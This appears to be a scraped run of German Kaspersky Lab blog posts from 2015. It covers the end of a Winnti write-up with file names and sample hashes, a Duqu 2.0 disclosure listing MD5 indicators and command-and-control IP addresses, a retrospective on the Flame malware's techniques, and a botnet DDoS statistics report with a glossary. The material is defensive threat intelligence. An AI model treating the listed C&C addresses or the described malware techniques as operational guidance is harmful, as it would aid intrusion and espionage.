Neben dem Sample-Tag enthält der Konfigurationsblock die Namen anderer Dateien, die in die Arbeit der RAT-Plattform verwickelt sind, sowie den Namen des Dienstes (Adobe Service), unter dem die Malware installiert wird. Das Vorhandensein der folgenden Dateien könnte darauf hinweisen, dass das System kompromittiert wurde:

C:\Windows\TEMP\tmpCCD.tmp
ServiceAdobe.dll
ksadobe.dat

Einer der erwähnten Treiber (ein bekanntes, schädliches Winnti-Netzwerkwerk-Rootkit) wurde mit einem gestohlenen Zertifikat einer Abteilung eines riesigen japanischen Konzerns signiert. Auch wenn sich diese Abteilung mit der Herstellung von Mikroelektronik beschäftigt, gehören zu den anderen Geschäftszweigen des Mischkonzerns auch die Entwicklung und Produktion von Medikament und medizinischer Ausrüstung.

Auch wenn die Art der Beteiligung von Winnti-Betreibern - von denen bisher immer angenommen wurde, dass sie nur für die Online-Gaming-Branche eine Bedrohung darstellen - an den Aktivitäten anderer Cyberspionage-Gruppen nach wie vor recht undurchsichtig ist, sind die Beweise nicht zu leugnen. Wenn von nun an also irgendwo von Winnti die Rede ist, sollte man nicht mehr ausschließlich an Unternehmen aus der Spiele-Branche denken – auch Firmen aus dem Bereich Telekommunikation und große Pharma-Konzerne könnten ins Visier der Angreifer geraten.

Hier die fraglichen Samples:

8e61219b18d36748ce956099277cc29b – Backdoor.Win64.Winnti.gy
5979cf5018c03be2524b87b7dda64a1a – Backdoor.Win64.Winnti.gf
ac9b247691b1036a1cdb4aaf37bea97f – Rootkit.Win64.Winnti.ai

The Mystery of Duqu 2.0: die Rückkehr eines raffinierten Cyberspionage-Akteurs


  Global Research and Analysis Team of Kaspersky Lab       11 Juni 2015 | 12:35  MSK

Ihr Kommentar  

Neue Zero-Day-Sicherheitslücke ermöglicht effiziente Einschleusung in den Kernelspeicher und das Verbergen im System

Duqu 2.0: Frequently Asked Questions

Die technische Dokumentation von Duqu 2.0 (PDF) ist hier verfügbar

Die Indicators of Compromise (IOC) stehen hier zum Lesen bereit

Yara-Regeln finden Sie hier.

Pressemitteilung

Früher im laufenden Jahr während eines Sicherheitschecks stießen wir bei Kaspersky Lab auf einen Cyberangriff, der mehrere unserer internen Systeme betraf.

Als Reaktion auf diese Erkenntnis leiteten wir umfassende Ermittlungen ein, die wiederum zur Entdeckung der neuen Malware-Plattform einer der kompetentesten, geheimnisvollsten und mächtigsten Gruppen in der APT-Welt führte, und zwar zu Duqu. Der Bedrohungsakteur Duqu verschwand im Jahr 2012 spurlos und es wurde angenommen, dass die Arbeit an diesem Projekt eingestellt worden war – bis jetzt. Unsere technische Analyse weist auf eine neue Angriffswelle hin, die eine aktualisierte Version der berüchtigten Duqu-Malware aus dem Jahr 2011 einschließt, welche manchmal als Stuxnets Stiefbruder bezeichnet wird. Wir tauften diese neue Malware und die damit zusammenhängende Plattform auf den Namen “Duqu 2.0”.

Einige der neuen Duqu-Infektionen aus den Jahren 2014-2015 werden mit den P5+1-Veranstaltungen und den Orten in Verbindung gebracht, an denen die Verhandlungen mit dem Iran über das Atomprogramm des Landes stattfinden. Der Bedrohungsakteur hinter Duqu scheint Angriffe auf die Veranstaltungsorte einiger dieser Gespräche auf höchster Ebene durchgeführt zu haben. Neben den P5+1-Events hat die Duqu 2.0-Gruppe auch ähnliche Angriffe auf die Veranstaltungen anlässlich des 70. Jahrestages der Befreiung von Auschwitz-Birkenau durchgeführt.

Im Fall von Kaspersky Lab machten sich die Angreifer eine Zero-Day-Schwachstelle im Windows-Kernel zunutze und möglicherweise bis zu zwei andere, aktuell gepatchte Sicherheitslücken, die zu der Zeit ebenfalls Zero-Day-Lücken waren. Die Analyse der Attacke ergab, dass das Hauptziel der Angreifer darin bestand, die Technologien von Kaspersky Lab, die laufenden Untersuchungen und interne Prozesse des Unternehmens auszuspionieren. Es wurden keine Störungen der Prozesse oder Systeme registriert. Weitere Details finden Sie in unserer Technischen Dokumentation.

Aus der Perspektive eines Bedrohungsakteurs muss es eine ziemlich gewagte Entscheidung sein, ein Sicherheitsunternehmen von Weltrang anzugreifen. Denn das bedeutet, dass die Attacke höchstwahrscheinlich aufgedeckt wird – es ist sehr unwahrscheinlich, dass der Angriff unbemerkt bleibt. Wird ein Sicherheitsanbieter attackiert, so muss man davon ausgehen, dass die Angreifer entweder sehr sicher sind, nicht geschnappt zu werden, oder dass es ihnen ziemlich egal ist, ob sie auffliegen oder nicht. Mit dem Angriff auf Kaspersky Lab hat die Duqu-Gruppe möglicherweise hoch gepokert, in der Hoffnung, unentdeckt zu bleiben – und sie hat verloren.

Bei Kaspersky Lab glauben wir an Transparenz, daher gehen wir mit diesen Informationen an die Öffentlichkeit. Kaspersky Lab ist davon überzeugt, dass seine Kunden und Partner sicher sind und es keine Auswirkungen auf die Produkte, Technologien und Services des Unternehmens gegeben hat.

Duqu 2.0 – Indicators of Compromise (IOCs)

MD5s

Action Loader:

089a14f69a31ea5e9a5b375dc0c46e45
16ed790940a701c813e0943b5a27c6c1
26c48a03a5f3218b4a10f2d3d9420b97
a6dcae1c11c0d4dd146937368050f655
acbf2d1f8a419528814b2efa9284ea8b
c04724afdb6063b640499b52623f09b5
e8eaec1f021a564b82b824af1dbe6c4d
10e16e36fe459f6f2899a8cea1303f06
48fb0166c5e2248b665f480deac9f5e1
520cd9ee4395ee85ccbe073a00649602
7699d7e0c7d6b2822992ad485caacb3e
84c2e7ff26e6dd500ec007d6d5d2255e
856752482c29bd93a5c2b62ff50df2f0
85f5feeed15b75cacb63f9935331cf4e
8783ac3cc0168ebaef9c448fbe7e937f
966953034b7d7501906d8b4cd3f90f6b
a14a6fb62d7efc114b99138a80b6dc7d
a6b2ac3ee683be6fbbbab0fa12d88f73
cc68fcc0a4fab798763632f9515b3f92

Kernel:

3f52ea949f2bd98f1e6ee4ea1320e80d
c7c647a14cb1b8bc141b089775130834

IPs der C&C

182.253.220.29
186.226.56.103

Um zu überprüfen, ob das Netzwerk von Duqu 2.0 befallen ist, können Sie auch die öffentliche IOC-Datei benutzen, die hier verfügbar ist.

Lehren aus Flame, drei Jahre später


   4 Juni 2015 | 13:43  MSK

Ihr Kommentar  

Mary-Beth Samekh

Vor drei Jahren, am 28. Mai 2012, gingen wir mit der Entdeckung einer Malware an die Öffentlichkeit, die wir Flame nannten. Als wir unsere FAQs veröffentlichten, stellte CrySyS Lab gleichzeitig seine umfassende Analyse von sKyWIper vor. Einige Tage zuvor hatte bereits das Maher CERT IOCs für Flamer veröffentlicht. Kurz gesagt: Flame, sKyWIper und Flamer sind unterschiedliche Namen für dieselbe Bedrohung, die als erste große Entdeckung nach Stuxnet und Duqu schnell die ganze Welt in Erstaunen versetzte.

Seit der Entdeckung von Flame haben wir schon von vielen anderen fortschrittlichen Malware-Plattformen berichtet, Regin und Equation eingeschlossen. Doch Flame ist und bleibt eine der komplexesten, überraschendsten und innovativsten Malware-Kampagnen, mit denen wir es je zu tun hatten.

Mit Rückblick auf die Entdeckung von Flame hier nun einige Lehren, die wir daraus gezogen haben.


  1. Erstklassige Schadsoftware auf Regierungsniveau kann groß sein. Ein vollständig bereitgestelltes Set an Flame-Modulen betrug um die 20 Megabytes, was viel ist. Vorher bewegte sich raffinierte Malware im Bereich von Kilobytes oder einigen hundert Kilobytes; die meisten Leute hätten damals eine ausführbare Datei von 6MB als „uninteressant“ verworfen. Nun nicht mehr.
  2. Hüpfende Air Gaps. Flame gehörte zu den ersten Schadprogrammen, die einen Mechanismus zur Umgehung von Air Gaps durch die Benutzung von USB-Sticks einführte. Wenn ein USB-Stick mit einem mit Flame infizierten Computer ohne Verbindung zum Internet verbunden wurde, speicherte die Schadsoftware die gestohlenen Information auf einer verborgenen Datei auf dem Stick. Diese Datei war für die meisten Datei-Explorer unsichtbar und enthielt bis zu 16MB gestohlener Dokumente und anderer Informationen von dem Opferrechner. Wurde so ein Stick in einen mit Flame infizierten Computer gesteckt, der mit dem Internet verbunden war, so wurden die verborgenen Informationen vom Stick gezogen und an die C&Cs gesendet.
  3. Dutzende von C&Cs. Im Fall von Flame zählten wir schließlich fast 100 unterschiedliche Command und Control-Server. Für eine zielgerichtete Malware ist das sehr ungewöhnlich und eine sehr große Zahl. Die Autoren von Flame schufen verschiedene Versionen der Schadsoftware, die sich mit vielen C&Cs verbanden, um so die potentiellen Auswirkungen einer Beschlagnahme zu begrenzen.
  4. Übernahme von Bluetooth Audio. Eins der Flame-Module versuchte, Bluetooth-Geräte in der Nachbarschaft des infizierten Computers zu identifizieren, um sie dazu zu benutzen, Geräusche aus dem Raum aufzunehmen. Das ist ein sehr seltener Angriffstyp, der erstmals von Flame eingesetzt wurde.
  5. Zeitalter der Massenüberwachung. Wir meinen, dass der Hauptzweck von Flame in der Durchführung von Massenüberwachung lag. Die Schadsoftware wurde entwickelt, um automatisch alles nur Erdenkliche von infizierten Rechnern zu sammeln – von Dokumenten und Screenshots über Tastatureingaben bis zu Audio-Aufnahmen. Die C&C-Server von Flame enthielten keine Option für manuellen Betrieb, alles lief automatisiert ab.
  6. MD5 ist tot. Eine der interessantesten Funktionen von Flame war die Art und Weise, wie die Malware andere Computer im lokalen Netzwerk infizierte. Die Attacke schloss das nahezu magische Re-Engineering eines Zertifikats ein, das benutzt werden kann, um Windows-Updates zu signieren. Dieses Zertifikat basierte auf einer MD5-Signatur, die die Angreifer erfolgreich fälschten, was darauf hinweist, dass sie die Möglichkeit hatten, willkürliche MD5-Hashes zu knacken.
  7. Untergraben des Vertrauens in Windows-Updates. Eins der interessantesten Flame-Module macht das, was eigentlich als „Gottesmodus“-Exploit beschrieben werden kann, und zwar sabotiert es Windows-Updates durch das Abfangen der Update-Anfragen. Jahrelang haben wir den Leuten gesagt, sie müssen wann immer möglich Windows aktualisieren, ebenso wie die Software von Drittanbietern. Flame hat sich das Vertrauen zunutze gemacht, das die Menschen in Updates hatten, und dieses wirkungsvoll untergraben.
  8. Die Spitze des Eisbergs. Nachdem wir Flame entdeckt hatten, reagierte unsere Generic Detection auch auf andere Samples. Aufgrund der Ähnlichkeit des Codes fanden wir zwei weitere Schadprogramme aus derselben Gruppe: Gauss und MiniFlame. Dadurch wurde uns klar, dass es viele andere unentdeckte Schadprogramme gibt und es möglicherweise Jahre dauert, sie zu alle finden.
  9. Alles hängt zusammen. Als wir Flame entdeckten, fragten die meisten Leute: “Hat es mit Stuxnet zu tun?”. Wir entgegneten: “Nein, dafür gibt es keine Anzeichen. Wir lagen falsch. Wochen später fanden wir ein Flame-Modul, das auch von der Stuxnet-Version aus dem Jahr 2009 zur Vervielfältigung benutzt wurde. Im Grunde wurde die 2009er-Version von Stuxnet eigens so konstruiert, dass sie sich mit einem Exploit von Flame reproduzieren kann. Das deutet darauf hin, dass diese zwei tatsächlich miteinander verbunden waren. Gleichzeitig hing Stuxnet mit Duqu zusammen und – wie wir erst kürzlich herausgefunden haben - auch mit der Equation group, und zwar über ihre Exploits, die ursprünglich vom Wurm Fanny benutzt worden waren. Manchmal dauerte es etwas länger, alle Verbindungen zu erkennen, auch wenn sie anfangs nicht besonders offensichtlich sind.
  10. “Flame ist lahm”. Als Kaspersky und CrySyS Lab die gemeinsame Analyse von Flame veröffentlichten, taten einige Leute die Malware als uninteressant ab. “Ein Schadprogramm von 20 Megabytes kann doch nichts sein! Unmöglich!”. (Die Zweifler verstummten, nachdem die Attacken auf die Microsoft Windows Updates und die MD5-Kollision aufgedeckt und gepatcht worden waren). Mikko Hypponen von F-Secure hat zu diesem Thema einen wundervollen Beitrag geschrieben: https://www.f-secure.com/weblog/archives/00002383.html

Wir möchten mit der Aufnahme einer phantastischen Rede des Bürgerrechtlers Chris Soghoian schließen, die den Titel trägt: “Lessons from the Bin Laden Raid and Cyberwar: Immunizations and Security Updates”.

https://archive.org/details/ChrisSoghoian-LessonsFromTheBinLadenRaidAndCyberwarImmunizations

Seine Ausführungen zu Flame beginnen bei 5:00, doch wir empfehlen Ihnen, den ganzen Clip anzuschauen. Chris bringt es in der Aufnahme auf den Punkt: “Trotz des kurzfristigen geheimdienstlichen Vorteils des Hackens von Software-Updates ist es es doch nicht wert“. Wir pflichten ihm bei und ergänzen, dass das Unterwandern der Sicherheit immer nach hinten losgeht.

Statistik zu Botnetz-basierten DDoS-Attacken im ersten Quartal 2015


  Kaspersky Lab       29 Mai 2015 | 12:00  MSK

Ihr Kommentar  

Methodologie
Quartalsergebnisse
Geografie der Attacken
Veränderungsdynamik der Menge von DDoS-Attacken
Art und Dauer der DDoS-AttackenSteuerungsserver und Botnetztypen
Fazit
Glossar

Methodologie

DDoS-Attacken (Distributed-Denial-of-Service-Attacken) gehören zu den am weitesten verbreiteten Angriffsmethoden im Repertoire Cyberkrimineller. Der Sinn einer Attacke dieser Art besteht darin, das Informationssystem (zum Beispiel eine Webseite) in einen Zustand zu versetzen, in dem Anwender keinen Zugriff mehr darauf erhalten können. Eines der populärsten DDoS-Szenarien ist ein Angriff mit Hilfe von Botnetzen.

Kaspersky Lab verfügt über langjährige anerkannte Expertise in der Bekämpfung von Cyberbedrohungen, darunter auch DDoS-Attacken der unterschiedlichsten Art und verschiedenster Komplexitätsniveaus. Unsere Experten beobachten die Aktivität von Botnetzen hauptsächlich mit Hilfe des Systems DDoS Intelligence (eine Komponente der Lösung 'Kaspersky DDoS Protection'), und können dadurch dazu beitragen, die Technologien zum Schutz vor DDoS-Attacken ständig zu verbessern. Das System DDoS Intelligence basiert auf einer Analyse von Befehlen, die von den Steuerungsservern der Cyberkriminellen an das Netz der Bots gesendet werden. Dabei ist es nicht erforderlich, dass auf dem Gerät des Anwenders ein Bot vorhanden ist oder dass die vom Server gesendeten Befehle ausgeführt werden.

Es gibt verschiedene Ansätze für die Analyse von DDoS-Aktivität. Einer davon ist die Untersuchung von Attacken, die auf konkrete Ressourcen durchgeführt werden (in der Regel auf die Kunden der Unternehmen, die für deren Schutz vor DDoS-Attacken verantwortlich sind). Die im vorliegenden Bericht angewandte Methode zur Analyse von Botnetzaktivität erlaubt es nicht, sich auf einzelne Kunden zu beschränken, sondern macht einen anderen Blickwinkel erforderlich.

Dieser Bericht vergleicht die von dem System DDoS Intelligence in der Zeit zwischen dem 1. Januar und dem 31. März (erstes Quartal) 2015 gesammelten Daten mit den entsprechenden Daten des vorangegangenen Quartals (1. Oktober bis 31. Dezember 2014).

Eine DDoS-Attacke gilt in diesem Bericht immer dann als einzelner Angriff, wenn die Pausen zwischen den Aktivitätsperioden des Botnetzes 24 Stunden nicht überschreiten. Falls beispielsweise ein und dieselbe Ressource von ein und demselben Botnet nach einer Pause von 24 Stunden erneut angegriffen wird, werten die Kaspersky-Experten das als zwei Attacken. Als einzelne Attacken werden ebenfalls diejenigen Anfragen an eine Ressource gewertet, die von Bots aus unterschiedlichen Botnets stammen.

Der geografische Standort der Opfer der DDoS-Attacken und die Server, von denen die Befehle verschickt werden, werden nach ihren IP-Adressen definiert. Die Anzahl der individuellen Ziele der DDoS-Attacken berechnet Kaspersky Lab in diesem Bericht nach der Zahl der individuellen IP-Adressen in der Quartalsstatistik.

Wir weisen ausdrücklich darauf hin, dass die Statistik des Systems DDoS Intelligence nur auf diejenigen Bots beschränkt ist, die Kaspersky Lab entdeckt und analysiert hat. Man sollte zudem bedenken, dass Botnetze nur eines von vielen Werkzeugen zur Umsetzung von DDoS-Attacken sind, und dass die hier aufgeführten Daten nicht ausnahmslos alle DDoS-Attacken umfassen, die in dem entsprechenden Zeitraum durchgeführt wurden.

Quartalsergebnisse

  • Im ersten Quartal 2015 wurden 23.095 DDoS-Attacken unter Verwendung von Botnetzen registriert, rund elf Prozent weniger als im vorangegangenen Quartal (25.929 Attacken).
  • Im Berichtszeitraum gab es 12.281 individuelle Opfer von DDoS-Attacken. Das sind etwa acht Prozent weniger als im vorherigen Quartal (13.312 Ziele).
  • China, die USA und Kanada führen das Rating der Länder an, die den meisten DDoS-Attacken ausgesetzt waren.
  • Die längste DDoS-Attacke, die im ersten Quartal 2015 registriert wurde, dauerte 140 Stunden (etwa sechs Tage). Die am stärksten angegriffene Ressource war innerhalb von drei Monaten 21 Attacken ausgesetzt.
  • SYN-DDoS und HTTP-DDoS waren die im ersten Quartal 2015 am weitesten verbreiteten Typen von DDoS-Attacken, die mit Hilfe von Botnetzen durchgeführt wurden.

Geografie der Attacken

Innerhalb des Berichtszeitraums wurden 23.095 DDoS-Attacken auf Ressourcen in 76 Ländern registriert. Gegenüber dem vorangegangenen Quartal ging die Zahl der Angriffe von 25.929 um rund 11 Prozent zurück. Gestiegen ist dagegen die Zahl der Länder, in denen sich die Angriffsziele befinden (vorher 66).

Die meisten DDoS-Attacken entfielen wie auch schon im vierten Quartal 2014 auf Ressourcen in China, den USA und Kanada. Unter den Zehn am stärksten angegriffenen Ländern gibt es geringfügige Veränderungen, doch die zehn Länder selbst blieben gleich.

Abb. 1: Top 10 der Länder nach Zahl der Attacken im vierten Quartal 2014 und im ersten Quartal 2015

Auf obenstehender Grafik ist zu erkennen, dass, während die Zahl der Angriffe auf Ressourcen in China und den USA deutlich zurückging, die Zahl der Attacken auf kanadische Server aber zugenommen hat. Ebenfalls gestiegen ist die Zahl der Angriffe auf Ressourcen in Russland, Südkorea und Frankreich.

Betrachtet man die Anzahl der Opfer von DDoS-Attacken in jedem der Länder, so sehen die aktuellen Top 10 aus wie die vorangegangenen. Im ersten Quartal 2015 griffen Botnetze insgesamt 12.281 Ziele an, das sind etwa acht Prozent weniger als im vorherigen Quartal (13.312 Ziele).

Abb. 2: Top 10 der Länder nach Zahl der individuellen Opfer von DDoS-Attacken im vierten Quartal 2014 und im ersten Quartal 2015

In Russland, Südkorea und Frankreich stieg die Zahl der angegriffenen Ressourcen im Vergleich zum vorangegangenen Quartal ebenso wie die Zahl der Angriffe auf diese Länder. In Kanada ging aber die Zahl der Opfer – trotz der Zunahme der Attacken – zurück, was von intensiveren Überfällen durch Cyberkriminelle auf ein und dieselben Ressourcen in diesem Land zeugt.

China und die USA führen in beiden Ratings, also sowohl nach Anzahl der Attacken als auch nach Zahl der Angriffsziele. Das ist dadurch zu erklären, dass das Hosting in diesen Ländern relativ günstig ist und viele Unternehmen einen Hosting-Provider in diesen Ländern wählen.

Die im ersten Quartal registrierte höchste Zahl von Attacken auf eine Ressource betrug 21:

Zahl der AttackenRessource
21Russischsprachige Webseite (Investitionsgruppe)
16A Vietnamesische Webseite (Hochzeitsdienstleistungen)
15Hosting-Provider in den USA

Abb. 3: Тop 3 nach Anzahl der Attacken auf eine Ressource, erstes Quartal 2015

Auch wenn innerhalb des Berichtszeitraums die meisten Attacken auf China, die USA und Kanada entfielen, belegten im Rating nach Anzahl der Attacken trotzdem russische und vietnamesische Ressourcen die ersten zwei Plätze. Erst auf Position drei folgt ein Hosting-Provider in den USA.

Veränderungsdynamik der Menge von DDoS-Attacken

Im Laufe des ersten Quartals* schwankte die Zahl der DDoS-Attacken sehr stark. Ende Januar waren die Botnetze am aktivsten, Mitte Februar waren sie am wenigsten aktiv.

Abb. 4: Veränderungsdynamik der Zahl der DDoS-Attacken, erstes Quartal 2015

* DDoS-Attacken können ununterbrochen mehrere Tage lang andauern. Eine einzelne Attacke könnte daher auf dem Zeitstrahl als mehrere Male zählen, und zwar als jeweils eine Attacke pro Tag. Zählt man nicht jede ununterbrochene Attacke einzeln (23.095), ergeben sich nach den zugrunde liegenden Daten daher etwas mehr Attacken (30.064).

Wie auf der unten stehenden Grafik zu erkennen ist, war im Dezember vergangenen Jahres ein deutlicher Sprung in der Anzahl der DDoS-Attacken über Botnetze zu verzeichnen. Daraufhin nahm die Zahl der Angriffe im Laufe der Monate Januar und Februar gleichmäßig ab, begann dann aber im März erneut zu steigen. Die Spitze im Dezember lässt sich mit den Ferien über Weihnachten und Neujahr erklären, als Online-Gangster versuchten, die Funktionsfähigkeit der von Anwendern aufgerufenen Webseiten und Services zu untergraben.

Abb. 5: Zahl der Attacken pro Monat, viertes Quartal 2014 bis erstes Quartal 2015

Der in Bezug auf Angriffe über Botnetze aktivste Wochentag war im ersten Quartal der Donnerstag, der damit den im vorangegangenen Quartal führenden Montag ablöste. Sonntags sind die Cyberkriminellen nach wie vor am wenigsten aktiv.

Abb. 6: Die für DDoS-Attacken beliebtesten Wochentage im vierten Quartal 2014 und im ersten Quartal 2015

Art und Dauer der DDoS-Attacken

Zu den wichtigsten Charakteristika von DDoS-Attacken zählen die Dauer und das Szenario, denn sie definieren die Höhe des Verlustes für die verteidigende Seite. Die überwiegende Mehrheit der Angriffe im Untersuchungszeitraum hatte eine Dauer von weniger als einer Stunde. Und während im vorangegangenen Quartal auch Attacken mit einer Dauer von bis zu zwei Wochen beobachtet wurden, gab es im ersten Quartal keine so lange andauernden Angriffe.


Dauer in StundenZahl der Angriffsziele, Q4 2014Zahl der Angriffsziele, Q1 2015
Über 15050
100-14983
50-99299121
20-49735433
10-191679703
5-921611426
Weniger als 484259594

Abb. 7: Dauer der DDoS-Attacken im vierten Quartal 2014 und im ersten Quartal 2015

Der Typ einer DDoS-Attacke wird aufgrund des Formats der „Junk“-Anfragen definiert, die an die Zielressource geschickt werden. Im ersten Quartal 2015 war die populärste Art von DDoS-Attacken wie auch schon im vierten Quartal 2014 die Methode SYN-DDoS. Die Attacken des Typs TCP-DDoS traten den zweiten Platz an die Angriffsart http-DDoS ab.

Abb. 8: Die populärsten Typen von DDoS-Attacken im vierten Quartal 2014 und im ersten Quartal 2015

Steuerungsserver und Botnetztypen

Die Steuerungszentren, die Verbrecher zur Kontrolle ihrer Botnetze benutzen, können sich in unterschiedlichen Ländern befinden. Ihr Standort steht in der Regel in keinerlei Verhältnis zum Aufenthaltsort der Cyberkriminellen oder zur Geografie der Verteilung der Bots, die über diesen Steuerungsserver kontrolliert werden. Nach Anzahl der Steuerungsserver, die im ersten Quartal in den jeweiligen Ländern aktiv waren, stehen die USA, China und Großbritannien an erster Stelle.

Abb. 9: Verteilung der Botnetz-Steuerungsserver nach Ländern, erstes Quartal 2015

Im ersten Quartal 2015 waren wie schon im vorangegangenen Quartal die Bots nach Anzahl der Attacken am aktivsten, die für die Infektion von Servern unter Linux vorgesehen sind – im Vergleich zu Bots, die für Windows-Geräte entwickelt wurden. Gleichzeitig blieb die Zahl der Attacken unter Verwendung von Windows-Botnetzen praktisch unverändert, während die Zahl der Angriffe von Linux-Botnetzen zurückging.

Abb. 10: Zahl der Attacken von Windows- und Linux-Botnetzen, viertes Quartal 2014 und erstes Quartal 2015

Obwohl es wesentlich weniger Botnetze auf der Grundlage von Linux gibt, übersteigt die Zahl der von ihnen ausgehenden Attacken sowie auch die Durchschlagskraft dieser Attacken die Angriffe von Zombie-Netzen auf der Windows-Plattform. Das hängt damit zusammen, dass Cyberkriminelle durch die Infektion eines Servers unter Linux ein breites Spektrum an Möglichkeiten zur Manipulation von Netzwerkprotokollen erhalten, und auch damit, dass die Internetverbindung infizierter Server gewöhnlich schneller ist als die von privat genutzten Rechnern. Dadurch können die Attacken mit größerer Durchschlagskraft erfolgen.

Zudem ist die Lebensdauer von Botnetzen auf Linux-Basis wesentlich länger als die der Windows-basierten Botnetze. Das liegt daran, dass es wesentlich schwieriger ist, solche Zombie-Netzwerke aufzuspüren und unschädlich zu machen, da Server unter Linux selten mit speziellen Schutzlösungen ausgestattet sind – im Gegensatz zu Geräten und Servern unter Windows.

Anzumerken ist auch noch, dass 93,2 Prozent der Ziele im ersten Quartal 2015 nur von einer einzelnen Bot-Familie angegriffen wurden. In 6,2 Prozent der Fälle waren an einer Attacke zwei Familien gleichzeitig beteiligt, und in 0,6 Prozent der Fälle drei oder mehr. Die Verbrecher benutzten dann entweder gleichzeitig mehrere verschiedene Bot-Familien für die Attacke, oder die Auftraggeber des Überfalls haben sich gleichzeitig an mehrere ausführende Cyberkriminelle gewandt.

Fazit

Die Zahl der mit Hilfe von Botnetzen durchgeführten DDoS-Attacken sowie auch die Zahl der Opfer dieser Attacken gingen im ersten Quartal 2015 gegenüber dem vorangegangenen Quartal zurück. Gleichzeitig stieg die Zahl der von dieser Bedrohung betroffenen Länder an. Traditionell entfallen die meisten Angriffe auf Ressourcen in den USA und China, da in diesen Ländern günstiges Hosting angeboten wird, wodurch es dort auch viele potenzielle Angriffsziele gibt. Allerdings befinden sich in den Top 10 auch Ziele aus Europa und der pazifischen Region. Wie unsere Statistiken zeigen, sind die unterschiedlichsten Ressourcen von den mit Hilfe von Botnetzen durchgeführten DDoS-Attacken betroffen, unabhängig von ihrer geografischen Zugehörigkeit. Mehr noch, diese Bedrohung weitet ihre Grenzen weiter aus.

Cyberkriminelle, die Botnetze zur Organisation von DDoS-Attacken benutzen, sind ziemlich hartnäckig: Die am längsten andauernde DDoS-Attacke, die Kaspersky Lab im ersten Quartal 2015 registrierte, lief etwa sechs Tage, und die am intensivsten angegriffene Ressource war innerhalb von drei Monaten 21 Attacken ausgesetzt. Doch wie Untersuchungen zeigen, ist selbst eine kurze einmalige Attacke in der Lage, die Funktionsfähigkeit einer ungeschützten Ressource zu zerstören. Eine einzige Attacke dieser Art kann ein Opfer bis zu 444.000 US-Dollar kosten, die Beeinträchtigung des guten Rufes einmal ganz außer Acht gelassen, die durch die Unzufriedenheit der Kunden entstehen kann, die den gewünschten Service nicht erhalten.

Unternehmen, die sich der Internet-Sicherheit verschrieben haben, investieren in die Bekämpfung von DDoS-Attacken und Botnetzen, insbesondere indem sie neue Malware aufspüren und Signatur-Datenbanken hinzufügen. Zudem schützen sie ihre Server vor Hacks und Computer vor Infektionen, indem sie die Aktivität von Steuerungsservern unterbinden und ähnliches. Doch DDoS-Attacken gehören nach wie vor zu den populärsten Methoden im Repertoire Cyberkrimineller. Organisationen sollten sich daher rechtzeitig darum kümmern, ihre Schutzmechanismen zu verbessern. Ein Service zur Filterung von „Junk“-Traffic macht es möglich, dass Online-Ressourcen selbst während einer lange andauernden und leistungsstarken Attacke für die Nutzer erreichbar bleiben.

Nützliche Links:

Ökosystem Botnetze

Schattenwirtschaft Botnetze - ein Millionengeschäft für Cyberkriminelle

IT Security Risks survey 2014: DDoS

Kaspersky DDoS Protection webpage

Kaspersky DDoS Protection whitepaper

Glossar

Bot – Schadprogramm, das auf Befehl von Cyberkriminellen verschiedene Aktionen durchführt.

Bot-Familie – Gesamtheit der Bots, die auf demselben Quellcode basieren, also verschiedene Versionen ein und desselben Bots, wobei ihre Steuerungsserver unterschiedlich sein können.

Botnetz – Gesamtheit der Geräte, die mit ein und demselben Bot infiziert sind, der mit ein und demselben Steuerungsserver verbunden ist. Cyberkriminelle verbreiten vorab spezielle Schadprogramme im Internet, die Server, Computer und mobile Geräte in aus der Ferne steuerbare „Zombies“ (oder auch Bots) verwandeln.

С&C (Steuerungs-/Befehls-) Server – ein Server, über den Onlinegangster die Befehle an die Bots senden, und auf dem sie deren Antworten empfangen. Im Falle von DDoS-Attacken senden die Bots auf Befehl der Verbrecher gleichzeitig Anfragen direkt an die Ressource des Opfers oder über Drittserver, das heißt sie führen eine „verteilte Attacke“ durch.

SYN-DDoS – Gesamtheit aller DDoS-Attacken, die eine Besonderheit des TCP-Protokolls (Transmission Control Protocol, Übertragungssteuerungsprotokoll) ausnutzen. Bei der Herstellung einer TCP-Verbindung führen der Client und der Server einen so genannten Threeway-Handshake durch. Der Client sendet ein Paket mit dem Flag SYN. Der Server antwortet, nachdem er das Paket erhalten hat, mit einem Paket mit den Flags SYN und ACK. Daraufhin sendet der Client ein ACK-Paket und bestätigt damit die Verbindung. Im Rahmen einer SYN-flood-Attacke sendet der Angreifer Pakete mit dem Flag SYN und fordert dabei kein Antwort-Paket mit den Flags SYN+ACK für die Verbindungsherstellung an, was den angegriffenen Server dazu bringt, Ressourcen für die Verarbeitung der Anfragedaten und das Absenden der Antwortpakete bereitzustellen.

TCP-DDoS – Gesamtheit der Angriffe, die wie im Fall von SYN-flood eine Besonderheit des TCP-Protokolls ausnutzen, dabei aber eine Verbindung zum angegriffenen Server herstellen. Im Fall einer Attacke des Typs TCP-flood übermittelt die angreifende Seite nach erfolgreichem Abschluss der „Handshake“-Prozedur die „Junk“-Daten über die eingerichtete Verbindung in großem Umfang oder sehr langsam. Das überlastet den Server und macht es Anwendern unmöglich, Ressourcen auszuwählen.

ICMP-DDoS – Gesamtheit der Angriffsszenarien über das Protokoll ICMP (Internet Control Message Protocol), das für die Übermittlung von Fehlermeldungen und anderen Ausnahmesituationen verwendet wird, die bei der Datenübermittlung auftreten. Im Falle einer Attacke sendet ein Cyberkrimineller eine Unmenge an ICMP-Anfragen in Richtung seines Angriffsziels, was dieses provoziert, Rechenleistung für die Verarbeitung der „Junk“-Anfragen zu verschwenden anstatt legitime Anfragen zu verarbeiten.

UDP-DDoS – Gesamtheit der Angriffsszenarien, die das UDP-Protokoll verwenden, das keinen Verbindungsaufbau erforderlich macht (User Datagram Protocol). Der Angreifer sendet dem Opfer zahlreiche UDP-Pakete, von denen jedes die Bearbeitung seitens des Servers und seines Kommunikationsequipments erforderlich macht. Das überlastet die Rechenressourcen des Angriffsziels.

HTTP-DDoS – alle Szenarien von DDoS-Attacken, deren Zielobjekte Webanwendungen sind. Im Rahmen der Umsetzung einer Attacke kann ein Cyberkrimineller sowohl normale GET/POST-Anfragen an die Homepage einer Webanwendung richten als auch nicht legitime Anfragen stellen (Anfragen nach irgendeiner Information in der Datenbank der Webanwendung, die Ausführung irgendwelcher Skripte seitens des Webservers und so weiter). Zudem können im Anfrage-Körper auch beliebige zusätzliche Header oder Cookie-Dateien eingefügt sein, um die Filter zu umgehen, die einen legitimen User anhand von Cookies identifizieren. Darüber hinaus kann ein Angreifer den Browser auf einem infizierten Gerät öffnen, um die Aktivität eines gewöhnlichen Webseiten-Besuchers zu imitieren, und so den Schutzsystemen des Angriffsziels die Möglichkeit zu nehmen, die Bots im allgemeinen Besucherstrom auszumachen.



Grabit und RATs


